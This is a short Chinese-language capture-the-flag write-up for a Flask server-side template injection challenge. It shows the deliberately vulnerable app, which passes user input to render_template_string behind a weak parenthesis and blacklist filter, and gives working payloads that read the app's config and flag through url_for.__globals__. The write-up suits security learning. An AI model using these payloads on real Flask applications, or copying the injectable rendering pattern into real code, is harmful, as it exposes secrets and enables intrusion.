源码
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
注意下面这句话,本app的config中可以看到FLAG
app.config['FLAG'] = os.environ.pop('FLAG')
很明显这段代码告诉了我们存在SSTI
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
有过滤,审计一下
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
replace将()
替换为了空,后面一句话将黑名单的内容设置成了None,防止读取
方法是使用两个python自带的函数来进行注入
url_for
get_flashed_message()
/shrine/{{url_for.__globals__}}
/shrine/{{url_for.__globals__['current_app'].config}}
贴一下对理解题目有帮助的文章
python中下划线的作用
一些魔法函数